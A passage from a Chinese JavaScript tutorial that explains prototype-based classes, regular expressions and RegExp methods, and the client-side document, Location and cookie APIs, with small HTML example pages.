</script>
可扩展属性
用以表示是否可以给对象添加新属性。所有内置对象和自定义对象都是显式可扩展的。
Object.isExtensible()判断对象是否是可扩展的。
Object.preventExtensions()可将对象转换为不可扩展的,一旦对象转换成不可扩展的了就不能转回可扩展的了。
类和模块
在JavaScript中也可以定义对象的类,让每个对象都共享某些属性,这种"共享"的特性是非常有用的。类的成员或实例都包含一些属性,用以存放它们的状态,其中有些属性定义了它们的行为(通常称为方法)。这些行为通常是由类定义的,而且为所有实例所共享。
在JavaScript中,类的实现是基于其原型继承机制的。如果两个实例都从一个原型对象上继承了属性,我们说它们是同一个类的实例。
JavaScript中类的一个重要特征是"动态可继承"(dynamically extendable),定义类是模块开发和重用代码的有效方式之一。
类和原型
在JavaScript中,类的所有实例对象都从一个类型对象上继承属性。因此,原型对象是类的核心。
在chap3-18中定义了inherit()函数,这个函数返回一个继承自某个原型对象的新对象。如果定义了一个原型对象,然后通过inherit()函数创建一个继承自它的对象,这样就定义了一个JavaScript类。通常,类的实例还需要进一步初始化,这通常是通过定义一个函数来创建并初始化这个新对象完成的。
chap3-26.html
<head><script src="js/chap3.js"></script></head>
<script>
// range: 实现一个能表示值的范围的类
function range(from,to){
//使用inherit()函数来创建对象,这个对象继承自下面定义的原型对象
//原型对象作为函数的一个属性存储,并定义所有“范围对象”所共享的方法(行为)
var r = inherit(range.methods);
//存储新的“范围对象”起始位置和结束位置(状态)
//这两个属性是不可继承的,每个对象都拥有唯一的属性
r.from = from;
r.to = to;
//返回这个新创建的对象
return r;
}
//原型对象定义方法,这些方法为每个范围对象所继承
range.methods = {
//如果x在范围内,则返回true;否则返回false
//这个方法可以比较数字范围,也可以比较字符串和日期范围
includes:function(x){
return this.from <= x && x <= this.to;},
//对于范围内每个整数都调用一次f
//这个方法只可用作数字范围
foreach:function (f){
for (var x = Math.ceil(this.from); x <= this.to ; x++) f(x);
},
//返回表示这个范围的字符串
toString:function (){return "("+ this.from + "..." + this.to + ")";}
};
//这是使用范围对象的一些例子
var r =range(1,3); //创建一个范围对象
console.log(r.includes(2)); //true:2 在这个范围内
r.foreach(console.log);
console.log(r.toString());
</script>
这段代码定义了一个工厂方法range(),用来创建新的范围对象。我们注意到,这里给range()函数定义了一个属性range.methods,用以便捷地存放定义类的原型对象。
注意range()函数给每个范围对象定义了from和to属性,用以定义范围的起始位置和结束位置,这两个属性是非共享的,当然也是不可继承的。range.methods中的方法都用到了from和to属性,并通过this关键字来指代调用这个方法的对象。任何类的方法都可以通过this的这种基本用法来读取对象的属性。
类和构造函数
构造函数是用来初始化和创建对象的。使用new调用构造函数会创建一个新对象,因此,构造函数本身只需要初始化这个新对象的状态即可。调用构造函数的一个重要特征是,构造函数的prototype属性被用做新对象的原型。这意味着通过同一个构造函数创建的对象都是继承自一个相同的对象,因此它们都是一个类的成员。
chap3-27.html
<script>
//表示值的范围的类的另一种实现
//这是一个构造函数,用以初始化新创建的“范围对象”
//注意,这里并没有创建并返回一个对象,仅仅是初始化
function Range(from, to) {
//存储这个“范围对象”的起始位置和结束位置(状态)
//这两个属性是不可继承的,每个对象都拥有唯一的属性
this.from = from;
this.to = to;
}
//所有的“范围对象”都继承自这个对象
//属性的名字必须是"prototype"
Range.prototype = {
//如果x在范围内,则返回true;否则返回false
//这个方法可以比较数字范围,也可以比较字符串和日期范围
includes: function(x) {
return this.from <= x && x <= this.to;
},
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
foreach: function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
},
//返回表示这个范围的字符串
toString: function() {
return "(" + this.from + "..." + this.to + ")";
}
};
//这里是使用“范围对象”的一些例子
var r = new Range(1, 3); //创建一个范围对象
console.log(r.includes(2));
r.foreach(console.log);
console.log(r.toString());
</script>
一个常见的编程约定:从某种意义上来讲,定义构造函数即是定义类,并且类首字母要大写,而普通的函数和方法首字母都是小写。
Range()函数就是通过new关键字来调用的,构造函数会自动创建对象,然后将构造函数作为这个对象的方法来调用一次,最后返回这个新对象。
上面两个例子有一个非常重要的区别:就是原型对象的命名。在第一段示例代码中的原型是range.methods。这种命名方式很方便同时具有很好的语义,但又过于随意。在第二段代码中的原型是Range.prototype,这是一个强制的命名。对Range()构造函数的调用会自动使用Range.prototype作为新Range对象的原型。
构造函数和类的标识
原型对象是类的唯一标识:当且仅当两个对象继承自同一个原型对象时,它们才是属于同一个类的实例。而初始化对象的状态的构造函数则不能作为类的标识,两个构造函数的prototype属性可能指向同一个原型对象。那么这两个构造函数创建的实例是属于一个类的。
尽管构造函数不像原型那样基础,但构造函数是类的"外在表现"。很明显,构造函数的名字通常用做类名。比如,我们说Range()构造函数创建Range对象,然而,更根本地讲,当使用instanceof运算符来检测对象是否属于某个类时会用到构造函数。假设这里有一个对象r,我们想知道r是否是Range对象,我们来这样写:
r instanceof Range // 如果r继承自Range.prototype,则返回true
任何JavaScript函数都可以用做构造函数,并且调用构造函数时需要用到prototype属性,因此,每个JavaScript函数都自动拥有一个prototype属性。这个属性的值是一个对象,这个对象包含唯一一个不可枚举的属性constructorconstructor属性的值是一个函数对象:
var F = function() {}; //这是一个函数对象:
var p = F.prototype; //这是F相关联的原型对象
var c = p.constructor; //这是与原型相关的函数
c === F; //=>true 对于任意函数F.prototype.constructor == F
下图展示了构造函数和原型之间的关系,包括原型到构造函数的反向引用及构造函数创建的实例。
构造函数和原型之间的关系
注意:在上面的例子中,Range重新定义了prototype,所以创建对象的constructor属性将不再是Range(),而是直接使用Object.prototype.constructor,即Object()。我们可以通过补救措施来修正这个问题,显式的给原型添加一个构造函数:
Chap3-28.html
Range.prototype = {
constructor:Range, //显式的设置构造函数反向引用
includes: function(x) {
return this.from <= x && x <= this.to;
},
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
foreach: function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
},
//返回表示这个范围的字符串
toString: function() {
return "(" + this.from + "..." + this.to + ")";
}
};
另外一种常见的解决办法是使用预定义的原型对象,预定义的原型对象包含constructor属性,然后依次给原型对象添加方法:
Chap3-29.html
//扩展预定义的Range.prototype对象,而不重写之
//这样就自动创建Range.prototype.constructor属性
Range.prototype.includes=function(x){
return this.from <= x && x <= this.to;
};
//对于这个范围内的每个整数都调用一次f
//这个方法只可用于数字范围
Range.prototype.foreach = function(f) {
for (var x = Math.ceil(this.from); x <= this.to; x++) f(x);
};
//返回表示这个范围的字符串
Range.prototype.toString=function() {
return "(" + this.from + "..." + this.to + ")";
};
在JavaScript中定义类的步骤可以缩减为一个分三步的算法。
1. 先定义一个构造函数,并设置初始化新对象的实例属性。
2. 给构造函数的prototype对象定义实例的方法。
3. 给构造函数定义类字段和类属性。
Complex.js
/*这个文件定义了Complex类,用来描述复数。这个构造函数为它所创建的每个实例定义了实例字段r和i,分别保存复数的实部和虚部*/
function Complex(real, imaginary) {
this.r = real; // The real part of the complex number.
this.i = imaginary; // The imaginary part of the number.
}
/*类的实例方法定义为原型对象的函数值的属性
*这个库定义的方法可以被所有实例继承,并为它们提供共享的行为
*需要注意的是,javascript的实例方法必须使用关键字this才存取实例的字段*/
Complex.prototype.add = function(that) {
return new Complex(this.r + that.r, this.i + that.i);
};
Complex.prototype.equals = function(that) {
return that != null && // must be defined and non-null
that.constructor === Complex && // and an instance of Complex
this.r === that.r && this.i === that.i; // and have the same values.
};
Complex.prototype.toString = function() {
return "{" + this.r + "," + this.i + "}";
};
//类字段(比如常量)和类方法直接定义为构造函数的属性
//这里定义了一些对复数运算有帮助的类的字段,它们的命名全都是大写,用以表明它们是常量
Complex.ZERO = new Complex(0,0);
Complex.I = new Complex(0,1);
Chap3-30.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-30</title>
<script src="js/Complex.js"></script>
</head>
<body style="font-size: x-large">
<script>
var c = new Complex(2, 3); //使用构造函数创建新对象
var d = new Complex(c.i,c.r); //用到了c的实例属性
document.write(c.add(d).toString()+"<br>"); // {5,5}:使用了实例的方法
var e=new Complex(0,1);
document.write(e.equals(Complex.I));
</script>
</body>
</html>
类的扩充
JavaScript中基于原型的继承机制是动态的:对象从其原型继承属性,如果创建对象之后原型的属性发生改变,也会影响到继承这个原型的所有实例对象。这意味着我们可以通过给原型对象添加新的方法来扩充JavaScript类。
Chap3-31.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-31</title>
<script src="js/Complex.js"></script>
</head>
<body>
<script>
if(!Complex.prototype.mag){
//计算复数的模,复数的模定义为复平面内点(r,i)到原点(0,0)的距离
Complex.prototype.mag = function() {
return Math.sqrt(this.r*this.r + this.i*this.i);
};
}
var c = new Complex(2,3);
document.write(c.mag());
</script>
</body>
</html>
正则表达式的模式匹配
JavaScript中的正则表达式用RegExp对象表示,可以使用RegExp()构造函数来创建RegExp对象,不过RegExp对象更多是通过一种特殊的直接量语法来创建;就像通过引号包裹字符的方式来定义字符串常量一样,正则表达式直接量定义为包含在一对斜杠(/)之间的字符。例如:
var pattern=/s$/; //用来匹配所有以字母“s”结尾的字符串
也可以用构造函数RegExp()来定义,例如:
var pattern1=new RegExp("s$");
正则表达式的模式规则是由一个字符序列组成的。包括所有字母和数字在内,大多数的字符都是按照字面含义描述待匹配的字符的。例如/java/可以匹配任何包含"java"子串的字符串。
直接量字符
正则表达式中所有字母和数字都是按照字面含义进行匹配的。JavaScript正则表达式语法也支持非字母的字符匹配,这些字符需要通过反斜线(\)作为前缀进行转义。
JavaScript正则表达式中的直接量字符:
字符 匹配
字母和数字字符 自身
\0 NUL字符(\u0000)
\t 制表符(\u0009)
\n 换行符(\u000A)
\v 垂直制表符(\u000B)
\f 换页符(\u000C)
\r 回车符(\u000D)
\xnn 由十六进制数指定的拉丁字符,例如\x0A等价于\n
\uxxxx 由十六进制数xxxx指定的Unicode字符,例如\u0009等价于\t
字符类
将直接量字符单独放进方括号内就组成了字符类(character class)。一个字符类可以匹配它包含的任意字符。例如,/[abc]/就和字母“a”、“b”、“c”中的任意一个都匹配。
字符 匹配
[...] 方括号内的任意字符
[^...] 不在方括号内的任意字符
. 除换行符和其它Unicode行终止符之外的任意字符
\w 任何ASCII单词字符,等价于[a-zA-Z0-9_]
\W 任何非ASCII单词字符的字符,等价于[^a-zA-Z0-9_]
\s 任何Unicode空白符
\S 任何非Unicode空白符的字符
\d 任何ASCII数字,等价于[0-9]
\D 除了ASCII数字之外的任何字符,等价于[^0-9]
注意:在方括号之内也可以写成这些特殊转义字符。比如,由于\s匹配所有的空白字符,\d匹配的是所有数字,因此,/[\s\d]/就是匹配任意空白或数字。
Chap3-32.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-32</title>
<style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style>
</head>
<body>
<p>
<label for="a">ASCII字符:</label>
<input type="text" id="a" pattern="\w">
</p>
<p>
<label for="b">ASCII数字:</label>
<input type="text" id="b" pattern="\d">
</p>
</body>
</html>
重复
字符 含义
{n,m} 匹配前一项至少n次,但不能超过m次
{n,} 匹配前一项n次或者更多次
{n} 匹配前一项n次
? 匹配前一项0次或1次,也就是说前一项是可选的,等价于{0,1}
+ 匹配前一项1次或多次,等价于{1,}
* 匹配前一项0次或多次,等价于{0,}
/\d{2,4}/ //匹配2~4个数字
/\w{3}\d?/ //精确匹配三个单词和一个可选的数字
/\s+java\s+/ //匹配前后带一个或多个空格的字符串“java”
/[^(]*/ //匹配0个或多个非左括号的字符
在使用*?时要注意,由于这些字符可能匹配0个字符,因此它们允许什么都不匹配。例如正则表达式/a*/实际上与字符串“bbbb”匹配,因为这个字符串含有0个a。
Chap3-33.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-33</title>
<style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style>
</head>
<body>
<p>
<label for="a">匹配6~8个ASCII字符:</label>
<input type="text" id="a" pattern="\w{6,8}">
</p>
<p>
<label for="b">匹配3个ASCII字符和1个可选的ASCII数字:</label>
<input type="text" id="b" pattern="\w{3}\d?">
</p>
</body>
</html>
非贪婪的重复
上表中匹配重复字符是尽可能多地匹配,而且允许后继的正则表达式继续匹配。因此,我们称之为“贪婪的”匹配。
我们同样可以使用这种表达式进行“非贪婪”的匹配。只需在待匹配的字符后跟随一个问号即可:??、+?、*?、{1,5}?。比如,正则表达式/a+/可以匹配一个或多个连续的字母a,当使用“aaa”作为匹配的字符串时,它会匹配全部三个字符。/a+?/同样匹配一个或多个连续字母a,但它是尽可能少地匹配,将“aaa”作为匹配字符串时,它只能匹配第一个a。
使用非贪婪的匹配模式所得到的结果可能和期望的并不一致。例如,/a+b/,当使用它来匹配“aaab”时,它会匹配了整个字符串。而/a+?b/,它匹配尽可能少的a和一个b,当它用来匹配“aaab”时,你期望它能匹配一个a和最后一个b。但实际上,这个模式却匹配了整个字符串。这是因为正则表达式的匹配模式总是会寻找字符串中第一个可能匹配的位置。由于该匹配是从字符串的第一个字符开始的,因此在这里不考虑它的子串中更短的匹配。
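贪婪与非贪婪的区别可以用下面的补充示例验证(原文没有,仅作示意):

```javascript
console.log("aaa".match(/a+/)[0]);    // "aaa":贪婪,尽可能多地匹配
console.log("aaa".match(/a+?/)[0]);   // "a":非贪婪,尽可能少地匹配
// 匹配总是从字符串中第一个可能的位置开始,
// 因此两个模式匹配"aaab"时结果相同,都是整个字符串
console.log("aaab".match(/a+b/)[0]);  // "aaab"
console.log("aaab".match(/a+?b/)[0]); // "aaab"
```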
选择、分组和引用
正则表达式的语法还包括指定选择项、子表达式分组和引用前一子表达式的特殊字符。
字符 含义
| 选择,匹配的是该符号左边的子表达式或右边的子表达式
(...) 组合,将几个项组合成一个单元,这个单元可通过*、+、?和|等符号加以修饰,而且可以记住和这个组合相匹配的字符串以供此后的引用使用
(?:...) 只组合,将项组合到一个单元,但不记忆与该组相匹配的字符
\n 和第n个分组第一次匹配的字符相匹配,组是圆括号中的子表达式(也有可能是嵌套的),组索引是从左到右的左括号数,(?:形式的分组不编码
字符|用于分隔供选择的字符。例如:
/ab|cd|ef/ //可以匹配字符串"ab",也可以匹配字符串"cd",还可以匹配字符串"ef"
/\d{3}|[a-z]{4}/ //可以匹配三位数字或4个小写字母
注意:选择项的尝试匹配总是从左到右,直到发现了匹配项。如果左边的选择项匹配,就忽略右边的选择项,即使它能产生更好的匹配。因此,当正则表达式/a|ab/匹配字符串“ab”时,它只能匹配第一个字符。
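“从左到右尝试选择项”这一点可以用下面的补充示例验证(原文没有,仅作示意):

```javascript
var r = /a|ab/.exec("ab");
console.log(r[0]);   // "a":左边的选择项先匹配成功,右边被忽略
var r2 = /\d{3}|[a-z]{4}/.exec("abcd");
console.log(r2[0]);  // "abcd":三位数字匹配失败后,尝试右边的4个小写字母
```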
正则表达式中的圆括号有多种作用。
一个作用是把单独的项组合成子表达式,以便可以像处理一个独立的单元那样用|、*、+或者?等来对单元内的项进行处理。例如:
/java(script)?/ //可以匹配字符串"java",其后可以有"script"也可以没有
/(ab|cd)+|ef/ //可以匹配字符串"ef",也可以匹配字符串"ab"或"cd"的一次或多次重复
Chap3-34.html
<body>
<p>
<label for="a">匹配"ab",或"cd",或"ef":</label>
<input type="text" id="a" pattern="ab|cd|ef">
</p>
<p>
<label for="b">匹配三位数字或4个小写字母:</label>
<input type="text" id="b" pattern="\d{3}|[a-z]{4}">
</p>
<p>
<label for="b">匹配字符串"java",或"javascript":</label>
<input type="text" id="b" pattern="java(script)?">
</p>
<p>
<label for="a">匹配"ef",或匹配字符串"ab"或"cd"的一次或多次重复:</label>
<input type="text" id="a" pattern="(ab|cd)+|ef">
</p>
</body>
另一个作用是允许在同一正则表达式的后部引用前面的子表达式。这是通过在字符\后加一位数字来实现的。这个数字指定了带圆括号的子表达式在正则表达式中的位置。例如:
/([Jj]ava([Ss]cript)?)\sis\s(fun\w*)/ //嵌套的子表达式([Ss]cript)可以用\2来指代
注意:因为子表达式可以嵌套另一个子表达式,所以它的位置是参与计数的左括号的位置。
/['"][^'"]*['"]/ //匹配的就是位于单引号或双引号之内的0个或多个字符。
/(['"])[^'"]*\1/ //与上面的正则表达式等价
在正则表达式中不用创建带数字编码的引用,也可以对子表达式进行分组。它是以(?:...)来进行分组。例如:
//这种圆括号并不生成引用。所以在这个表达式中,\2引用了与(fun\w*)匹配的文本。
/([Jj]ava(?:[Ss]cript)?)\sis\s(fun\w*)/
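反向引用和非捕获分组的行为可以用下面的补充示例验证(原文没有,仅作示意):

```javascript
// \1引用第一个捕获组:要求前后引号成对出现
console.log(/(['"])[^'"]*\1/.test("'hello'"));   // true
console.log(/(['"])[^'"]*\1/.test("'hello\""));  // false:前后引号不一致
// (?:...)不参与编号,因此(fun\w*)是第2个分组
var m = /([Jj]ava(?:[Ss]cript)?)\sis\s(fun\w*)/.exec("JavaScript is funny");
console.log(m[1]);  // "JavaScript"
console.log(m[2]);  // "funny"
```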
指定匹配位置
正则表达式中的锚字符:
字符 含义
^ 匹配字符串的开头,在多行检索中,匹配一行的开头
$ 匹配字符串的结尾,在多行检索中,匹配一行的结尾
\b 匹配一个单词的边界,简而言之,就是位于字符\w\W之间的位置,或位于字符\w和字符串开头或者结尾之间的位置。(但需要注意,[\b]匹配的是退格符)
\B 匹配非单词边界的位置
(?=p) 零宽正向先行断言,要求接下来的字符都与p匹配,但不能包括匹配p的那些字符
(?!p) 零宽负向先行断言,要求接下来的字符不与p匹配
最常用的锚元素是^,它用来匹配字符串的开始,锚元素$用来匹配字符串的结束。例如:
/^JavaScript$/ //要匹配单词“JavaScript”
如果想匹配“Java”这个单词本身,可以使用/\sJava\s/,可以匹配前后都有空格的单词"Java"。但是这样做有两个问题,第一,如果“Java”出现在字符串的开始或者结尾,就匹配不成功,除非开始和结尾处各有一个空格。第二,当找到了与之匹配的字符串时,它返回的匹配字符串的前端和后端都有空格。因此,我们使用单词的边界\b来代替真正的空格符\s进行匹配(或定位),这样的正则表达式就写成了/\bJava\b/
元素\B把匹配的锚点定位在不是单词的边界之处。因此,正则表达式/\B[Ss]cript/与“JavaScript”和“postscript”匹配,但不与“script”和“Scripting”匹配。
任意正则表达式都可以作为锚点条件。如果在符号(?=和)之间加入一个表达式,它就是一个先行断言,用以说明圆括号内的表达式必须正确匹配,但匹配结果并不包含这些字符。例如,要匹配后面跟有冒号的语言名,可以使用/[Jj]ava([Ss]cript)?(?=\:)/。这个正则表达式可以匹配“JavaScript: The Definitive Guide”中的“JavaScript”,但不能匹配“Java in a Nutshell”中的“Java”,因为它后面没有冒号。
带有(?!的断言是负向先行断言,用以指定接下来的字符都不能与p匹配。例如:/Java(?!Script)([A-Z]\w*)/可以匹配“Java”后跟随一个大写字母和任意多个ASCII单词字符,但“Java”后面不能跟随“Script”。它可以匹配“JavaBeans”,但不能匹配“Javabeans”。
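两种先行断言的效果可以用下面的补充示例验证(原文没有,仅作示意):

```javascript
// (?=):要求后面紧跟冒号,但冒号不计入匹配结果
var m = /[Jj]ava([Ss]cript)?(?=\:)/.exec("JavaScript: The Definitive Guide");
console.log(m[0]);  // "JavaScript":不包含冒号
console.log(/[Jj]ava([Ss]cript)?(?=\:)/.test("Java in a Nutshell"));  // false
// (?!):要求后面不能紧跟"Script"
console.log(/Java(?!Script)([A-Z]\w*)/.test("JavaBeans"));   // true
console.log(/Java(?!Script)([A-Z]\w*)/.test("JavaScript"));  // false
```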
Chap3-35.html
<head><style type="text/css">
label{font-size: xx-large}
p>:invalid{outline: medium solid red}
p>:valid{outline: medium dotted green}
</style></head>
<body>
<p>
<label for="a">匹配位于单引号之内的0个或多个字符:</label>
<input type="text" id="a" pattern="(['])[^']*\1">
</p>
<p>
<label for="a">要匹配单词“JavaScript”:</label>
<input type="text" id="a" pattern="^JavaScript$">
</p>
<p>
<label for="a">要匹配前后都有空格的单词“Java”:</label>
<input type="text" id="a" pattern="\sJava\s">
</p>
<p>
<label for="a">要匹配单词“Java”:</label>
<input type="text" id="a" pattern="\bJava\b">
</p>
</body>
修饰符
和之前讨论的正则表达式语法不同,修饰符是放在/符号之外的。JavaScript支持三个修饰符:
字符 含义
i 执行不区分大小写的匹配
g 执行一个全局匹配,简言之,即找到所有的匹配,而不是在找到第一个之后就停止
m 多行匹配模式,^匹配一行的开头和字符串的开头,$匹配行的结束和字符串的结束
/java$/im //可以匹配java,也可以匹配"Java\nis Fun".
用于模式匹配的String方法
String支持4种使用正则表达式的方法:
• search():它的参数是一个正则表达式,返回第一个与之匹配的子串的位置,如果找不到匹配的子串,它将返回-1
document.write("javascript".search(/script/i)); //返回4
• replace():用于执行检索与替换操作。其中第一个参数是正则表达式,第二个参数是要进行替换的字符串。
var text="javascript and Javascript and javascript";
document.write(text.replace(/javascript/gi,"JavaScript"));
• match():它唯一的参数就是一个正则表达式,返回的是一个由匹配结果组成的数组。如果该正则表达式设置了修饰符g,则该方法返回的数组包含字符串中所有匹配的结果。
text="1 plus 2 equals 3";
var arr=text.match(/\d+/g);
• split():将调用它的字符串拆分为一个子串组成的数组,使用的分割符是split()的参数。
text="1, 2, 3, 4, 5";
var arr=text.split(/\s*,\s*/); //允许逗号两边留任意多的空白符
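这4个方法的行为可以用下面的补充示例汇总验证(原文没有,仅作示意):

```javascript
console.log("javascript".search(/script/i));  // 4:子串"script"的起始位置
var text = "javascript and Javascript";
console.log(text.replace(/javascript/gi, "JavaScript"));
// "JavaScript and JavaScript":gi修饰符使所有大小写变体都被替换
var nums = "1 plus 2 equals 3".match(/\d+/g);
console.log(nums);                            // ["1", "2", "3"]
var parts = "1, 2, 3".split(/\s*,\s*/);       // 逗号两边允许任意空白
console.log(parts);                           // ["1", "2", "3"]
```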
RegExp对象
正则表达式是通过RegExp对象来表示的。 RegExp()构造函数带有两个字符串参数,其中第一个参数包含正则表达式的主体部分,需要注意的是,不论是字符串直接量还是正则表达式,都是用\字符作为转义字符的前缀。第二个参数是可选的,它指定正则表达式的修饰符。
//全局匹配字符串中的6个数字,注意这里使用了"\\",而不是“\”
var zipcode=new RegExp("\\d{6}","g");
RegExp对象的属性
• source属性:是一个只读的字符串,包含正则表达式的文本;
• global属性:是一个只读的布尔值,用以说明这个正则表达式是否带有修饰符g
• ignoreCase属性:是一个只读的布尔值,用以说明正则表达式是否带有修饰符i
• multiline属性:是一个只读的布尔值,用以说明正则表达式是否带有修饰符m
• lastIndex属性:是一个可读/写的整数,如果匹配模式带有g修饰符,这个属性存储在整个字符串中下一次检索的开始位置,这个属性会被exec()test()方法用到。
Chap3-36.html
<script>
document.write("javascript".search(/script/i)); //返回4
var text="javascript and Javascript and javascript";
document.write("<br>");
document.write(text.replace(/javascript/gi,"JavaScript"));
document.write("<br>");
text="1 plus 2 equals 3";
var arr=text.match(/\d+/g);
for(var i in arr)
document.write(arr[i]+"<br>");
text="1, 2, 3, 4, 5";
var arr=text.split(/\s*,\s*/); //允许逗号两边留任意多的空白符
for(var i in arr)
document.write(arr[i]);
//全局匹配字符串中的6个数字,注意这里使用了"\\",而不是“\”
var zipcode=new RegExp("\\d{6}","g");
document.write("<br>");
document.write(zipcode.source+"<br>");
document.write(zipcode.global+"<br>");
</script>
RegExp对象的方法
exec()方法:用于检索字符串中的正则表达式的匹配。语法:
RegExpObject.exec(string)
• 如果exec()找到了匹配的文本,则返回一个结果数组。否则,返回null。此数组的第0个元素是与正则表达式相匹配的文本,第1个元素是与RegExpObject 的第1个子表达式相匹配的文本(如果有的话),第2个元素是与RegExpObject 的第2个子表达式相匹配的文本(如果有的话),以此类推。
• 在调用非全局RegExp对象的exec()方法时,返回的数组与调用方法String.match()返回的数组是相同的。
• 当RegExpObject是一个全局正则表达式时,它会在RegExpObject的lastIndex属性指定的字符处开始检索字符串string。当exec()找到了与表达式相匹配的文本时,它将把RegExpObject的lastIndex属性设置为匹配文本的最后一个字符的下一个位置。这就是说,可以通过反复调用exec()方法来遍历字符串中的所有匹配文本。当exec()再也找不到匹配的文本时,它将返回null
注意:如果在一个字符串中完成了一次模式匹配之后要开始检索新的字符串,就必须手动地把lastIndex属性重置为0。
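lastIndex的推进、重置以及这条注意事项,可以用下面的补充示例演示(原文没有,仅作示意):

```javascript
var re = /\d+/g;
console.log(re.exec("ab12cd34")[0]); // "12"
console.log(re.lastIndex);           // 4:下次从位置4开始检索
console.log(re.exec("ab12cd34")[0]); // "34"
console.log(re.lastIndex);           // 8
// 换了新字符串但lastIndex仍是8,超出"x99"的长度,检索失败
console.log(re.exec("x99"));         // null(失败时lastIndex同时被重置为0)
re.lastIndex = 0;                    // 换新字符串前显式重置,保证从头检索
console.log(re.exec("x99")[0]);      // "99"
```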
test()方法:用于检测一个字符串是否匹配某个模式。语法:
RegExpObject.test(string)
• 如果字符串string中含有与RegExpObject匹配的文本,则返回true,否则返回false
Chap3-37.html
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>chap3-37</title>
</head>
<body>
<script>
var str="Visit W3School";
var patt=new RegExp("W3School","g");
var result;
while ((result=patt.exec(str))!=null){
document.write(result+"<br>");
document.write(patt.lastIndex+"<br>");
}
var patt1=new RegExp("W3School");
var result=patt1.test(str);
document.write("Result: "+result+"<br>");
</script>
</body>
</html>
客户端JavaScript
• document对象
• Window对象
• 使用DOM元素
• 脚本化CSS
• 脚本化HTTP
• jQuery类库
• 客户端存储
• JSON
document对象
文档对象模型DOM把JavaScript和HTML文档的内容联系起来。通过使用DOM,可以添加、移除和操作各种元素,还可以使用事件(event)来响应用户的交互操作,以及完全控制CSS。
document对象是通往DOM功能的入口,它向你提供了当前文档的信息,以及一组可供探索、导航、搜索或操作结构与内容的功能。
问题 解决方案
获取文档信息 使用document元数据属性
获取文档位置信息 使用document.location属性
导航至某个新文档 修改Location对象的某个属性值
读取和写入cookie 使用document.cookie属性
判断浏览器处理文档的进展情况 使用document.readyState属性
获取浏览器已实现的DOM功能详情 使用document.implementation属性
获取代表特定元素类型的对象 使用document属性,如imageslinks
在文档中搜索元素 使用以document.getElement开头的各种方法
用CSS选择器在文档中搜索元素 使用document.querySelectordocument.querySelectorAll方法
合并进行链式搜索以寻找元素 对之前搜索的结果调用搜索方法
在DOM树中导航 使用文档/元素的方法与属性,如hasChildNodes()
使用document元数据
元数据属性 说明
characterSet 返回文档的字符集编码。只读
charset 获取或设置文档的字符集编码
compatMode 获取文档的兼容性模式
cookie 获取或设置当前文档的cookie
defaultCharset 获取浏览器所使用的默认字符编码
dir 获取或设置文档的文本方向
domain 获取或设置当前文档的域名
implementation 提供可用DOM功能的信息
lastModified 返回文档的最后修改时间(如果修改时间不可用则返回当前时间)
location 提供当前文档的URL信息
readyState 返回当前文档的状态。只读
referrer 返回链接到当前文档的文档URL
title 获取或设置当前文档的标题
Chap3-38.html
<head>
<meta charset="UTF-8">
<title>chap3-38</title>
<style type="text/css">
pre{font-size: xx-large}
</style>
</head>
<body>
<script>
document.dir="rtl";
document.writeln("<pre>");
document.writeln("characterSet:"+document.characterSet);
document.writeln("charset:"+document.charset);
document.writeln("compactMode:"+document.compatMode);
document.writeln("defaultCharset:"+document.defaultCharset);
document.writeln("dir:"+document.dir);
document.writeln("domain:"+document.domain);
document.writeln("lastModified:"+document.lastModified);
document.writeln("referrer:"+document.referrer);
document.writeln("title:"+document.title);
document.writeln("</pre>");
</script>
compatMode属性返回值有两个:
• CSS1Compat:代表此文档遵循某个有效的HTML规范(但不必是HTML5,有效的HTML4文档也会返回这个值)
• BackCompat:代表此文档含有非标准的功能,已触发怪异模式
使用Location对象
Location对象的属性和方法 说明
protocol 获取或设置文档URL的协议部分
host 获取或设置文档URL的主机和端口部分
href 获取或设置当前文档的地址
hostname 获取或设置文档URL的主机名部分
port 获取或设置文档URL的端口部分
pathname 获取或设置文档URL的路径部分
search 获取或设置文档URL的查询(问号串)部分
hash 获取或设置文档URL的锚(井号串)部分
assign(URL) 导航到指定的URL上
replace(URL) 清除当前文档并导航到URL所指定的那个文档
reload() 重新载入当前的文档
resolveURL(URL) 将指定的相对URL解析成绝对URL
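Location对象的这些URL组成部分与标准URL类的同名属性是一致的,可以用URL对象在任何JavaScript环境中体会各部分的取值形式(示意性的例子,这里的地址是假设的):

```javascript
// 用标准URL类拆解一个URL的各个组成部分
// (Location对象的同名属性返回同样形式的值)
var url = new URL("http://www.example.com:8080/docs/page.html?name=apple#section1");

console.log(url.protocol);  // "http:"(包含冒号)
console.log(url.host);      // "www.example.com:8080"(主机名加端口)
console.log(url.hostname);  // "www.example.com"
console.log(url.port);      // "8080"
console.log(url.pathname);  // "/docs/page.html"
console.log(url.search);    // "?name=apple"(包含问号)
console.log(url.hash);      // "#section1"(包含井号)
```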
Chap3-39.html
<body>
<button id="pressme">Press Me</button>
<script>
document.writeln("<pre>");
document.writeln("protocol:"+document.location.protocol);
document.writeln("host:"+document.location.host);
document.writeln("hostname:"+document.location.hostname);
document.writeln("href:"+document.location.href);
document.writeln("port:"+document.location.port);
document.writeln("pathname:"+document.location.pathname);
document.writeln("search:"+document.location.search);
document.writeln("hash:"+document.location.hash);
document.writeln("</pre>");
document.getElementById("pressme").onclick=function () {
document.location.assign("chap3-38.html");
}
</script>
</body>
读取和写入cookie
cookie属性让你可以读取、添加和更新文档所关联的cookie。cookie是形式为name=value的名称/值对。如果存在多个cookie,那么cookie属性会把它们一起返回,之间以分号间隔。
在创建cookie时,可以添加额外字段来改变cookie的处理方式:
额外项 说明
path=path 设置cookie关联的路径,如果没有指定则默认使用当前文档的路径
domain=domain 设置cookie关联的域名,如果没有指定则默认使用当前文档的域名
max-age=seconds 设置cookie的有效期,以秒的形式从它创建之时起开始计算
